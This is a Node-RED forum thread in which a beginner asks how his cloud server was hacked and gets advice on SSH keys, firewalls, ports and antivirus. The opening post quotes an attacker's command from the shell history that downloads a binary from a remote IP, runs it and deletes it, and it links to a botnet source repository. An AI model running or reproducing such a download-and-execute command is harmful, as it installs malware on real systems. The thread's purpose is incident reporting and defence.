# Server hacked - is Node-Red an entry point and how to prevent this?

**URL:** <https://discourse.nodered.org/t/server-hacked-is-node-red-an-entry-point-and-how-to-prevent-this/73704>\
**Category:** General\
**Tags:** security\
**Created:** [15 January 2023 12:04 UTC](https://discourse.nodered.org/t/server-hacked-is-node-red-an-entry-point-and-how-to-prevent-this/73704 "2023-01-15T12:04:42Z")\
**Posts on this page:** 6\
**Page:** 1

<div class="post-metadata">

**Author:** ![Jacob](https://avatars.discourse-cdn.com/v4/letter/j/f1d935/32.png) [@Jacob](https://discourse.nodered.org/u/Jacob)\
**Post date:** [15 January 2023 12:04 UTC](https://discourse.nodered.org/t/server-hacked-is-node-red-an-entry-point-and-how-to-prevent-this/73704/1 "2023-01-15T12:04:42Z")

</div>

Hi community,  
My server running on Digitalocean has been hacked around October, most likely by a bot net ([google:](https://github.com/USBBios/Dream-qBot-Botnet-Source) . This thing is used for DDOS as far as I understand but you never know what else has been changed...

I realized because I saw many commands similar to the one below in the command line:  
"cd /tmp; curl -o php [http://XX.XX.XX.XX/a-r.m-6.ISIS](http://xx.xx.xx.xx/a-r.m-6.ISIS); chmod +x php; ./php; rm -rf php"  
If you saw things like this, you have also been hacked. It seems like I have not been the only one, especially in the Node-Red community:

> [@Dashboard suddenly asks for password (Hacked Node-RED servers)](https://discourse.nodered.org/t/dashboard-suddenly-asks-for-password-hacked-node-red-servers/69083/):
>
> Hello, and thanks for your reply in advance. For a few years I have used node-red for home control, simple setup, control of heat pumps, monitoring of temperatures etc., I am far from an expert on this, but I got it to work. have been using node red dashboard, this has worked great until tonight, when I had to change the temp setting, worked fine earlier today. What suddenly happened is that the dashboard asks for a password, the same for the flow editor. I have not set this up with a password…

[URLhaus | Checking your browser](https://urlhaus.abuse.ch/url/2156785/) seems to be DO specific problem or for node-red users?  
[Openhab Servers potential target for attacs - hack - openHAB Community](https://community.openhab.org/t/openhab-servers-potential-target-for-attacs/140073)

Could it be that hackers just looked for an entry point scanning Node\_red: ports ?

So I am a beginner in IT like many others here and the topics I found on this forum are in my view rather professional level. Digitalocean told me to scrap the instance which I will do but its a major pain since I run node-red, Grafana, InfluxDB etc. on it so setting it all up again is a good day+ of work.

My questions since I am rather new to IT security:

- Can anyone recommend an entry level guide to IT security on hosted servers like Digitalocean where I don't need to spend days to understand the keywords and what I need to do?
- Digitalocean wrote me that: _"your Droplet does have password authentication enabled. Password-based authentication lacks a strong identity check and no one wants hackers to launch a brute force attack to hack into your server, so it's a good practice to disable password authentication in the OpenSSH server. "_ Doesn't make sense to me, can someone explain that? I understand the brute force part but wouldn't it make more sense to just have a very complex password instead of having none?
- Sorry, very beginner question but I red in this forum that its dangerous to leave a port open. On a hosted server with node-red running, what does it mean to open and close a port?
- Digitalocean recommended to used clamAV and the freshclam library but then again I couldn't do it because it said "database load killed by Signal 9" which could refer that my instance has not enough RAM to execute that, anyone has had and overcome this problem?

Many thanks here, it seems that around last October a rather large attack was happening and I guess many early users like me aren't aware that this happened. Would be great to have a simple guide on how to avoid this to have it never happen again.  
Jacob

---

<div class="post-metadata">

**Author:** ![cymplecy](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/cymplecy/32/2773_2.png) [@cymplecy](https://discourse.nodered.org/u/cymplecy)\
**Post date:** [15 January 2023 12:27 UTC](https://discourse.nodered.org/t/server-hacked-is-node-red-an-entry-point-and-how-to-prevent-this/73704/2 "2023-01-15T12:27:47Z")

</div>

Short answer is that it quite difficult to run your own secure cloud server and it is not something a beginner should do.

---

<div class="post-metadata">

**Author:** ![TotallyInformation](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/totallyinformation/32/31_2.png) [@TotallyInformation](https://discourse.nodered.org/u/TotallyInformation)\
**Post date:** [15 January 2023 13:10 UTC](https://discourse.nodered.org/t/server-hacked-is-node-red-an-entry-point-and-how-to-prevent-this/73704/3 "2023-01-15T13:10:02Z")

</div>

> [@Jacob](#):
>
> Would be great to have a simple guide on how to avoid this to have it never happen again.

There is plenty of guidance on the forum, in the docs and elsewhere about running node-red securely when open to the Internet.

But this isn't really a Node-RED issue as such. Nobody should be opening up a service or server to the Internet without knowing what they are doing, it is a recipe for disaster.

You should now rebuild your Pi from scratch since you don't know what the attackers have done to it.

In the future, make sure you understand the consequences and requirements of setting up an Internet-facing service before starting.

---

<div class="post-metadata">

**Author:** ![TotallyInformation](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/totallyinformation/32/31_2.png) [@TotallyInformation](https://discourse.nodered.org/u/TotallyInformation)\
**Post date:** [15 January 2023 13:16 UTC](https://discourse.nodered.org/t/server-hacked-is-node-red-an-entry-point-and-how-to-prevent-this/73704/4 "2023-01-15T13:16:10Z")

</div>

> [@Jacob](#):
>
> Can anyone recommend an entry level guide to IT security on hosted servers like Digitalocean where I don't need to spend days to understand the keywords and what I need to do?

No. You DO need to spend days understanding things.

> [@Jacob](#):
>
> Doesn't make sense to me, can someone explain that? I understand the brute force part but wouldn't it make more sense to just have a very complex password instead of having none?

A stronger password is better than a weak one of course. But they are suggesting that you use certificate-based SSH authentication which is much stronger still.

> [@Jacob](#):
>
> Sorry, very beginner question but I red in this forum that its dangerous to leave a port open. On a hosted server with node-red running, what does it mean to open and close a port?

TCP/IP is the protocol for networking over the Internet. It uses addresses and ports to identify channels of communication. Many common services have standard ports. For example, the web (HTTP/HTTPS) typically uses Port 80 for HTTP and Port 443 for HTTPS.

You can use a local firewall on a Droplet to ensure that only specific ports are open. You could also use it to change default ports. For example, SSH runs on Port 22 but an internet-facing service will start being attacked on that port within seconds of appearing on the Internet - so better to change the externally facing port to something else.

> [@Jacob](#):
>
> clamAV

AV = Anti-Virus. Good for protecting the data files on your server but not much else.

---

<div class="post-metadata">

**Author:** ![Colin](https://sea2.discourse-cdn.com/flex026/user_avatar/discourse.nodered.org/colin/32/17040_2.png) [@Colin](https://discourse.nodered.org/u/Colin)\
**Post date:** [15 January 2023 13:29 UTC](https://discourse.nodered.org/t/server-hacked-is-node-red-an-entry-point-and-how-to-prevent-this/73704/5 "2023-01-15T13:29:46Z")

</div>

Some of what you need to know is contained in this FAQ post, containing advice on how to safely access node-red over the internet.

> [@Safely accessing Node-RED over the Internet](https://discourse.nodered.org/t/safely-accessing-node-red-over-the-internet/45024):
>
> Update 2025-02-19 The best advice for most people doing home automation is still: Don't expose Node-RED to the outside world! Where you really have to have some outside access, keep it as hands-off and restricted as possible. For example, using a Telegram bot. Also keep it as minimal as possible, e.g. Don't expose the Editor - EVER! If you want to provide remote control of your heating or the precious plants in your greenhouse, provide explicit controls with strong limits. Don't expose ever…

---

<div class="post-metadata">

**Author:** ![system](https://us1.discourse-cdn.com/flex026/uploads/nodered/original/1X/d073cd938eafa2e558d7c2cd59003b3ef4963033.png) [@system](https://discourse.nodered.org/u/system)\
**Post date:** [16 March 2023 13:30 UTC](https://discourse.nodered.org/t/server-hacked-is-node-red-an-entry-point-and-how-to-prevent-this/73704/6 "2023-03-16T13:30:15Z")

</div>

This topic was automatically closed 60 days after the last reply. New replies are no longer allowed.
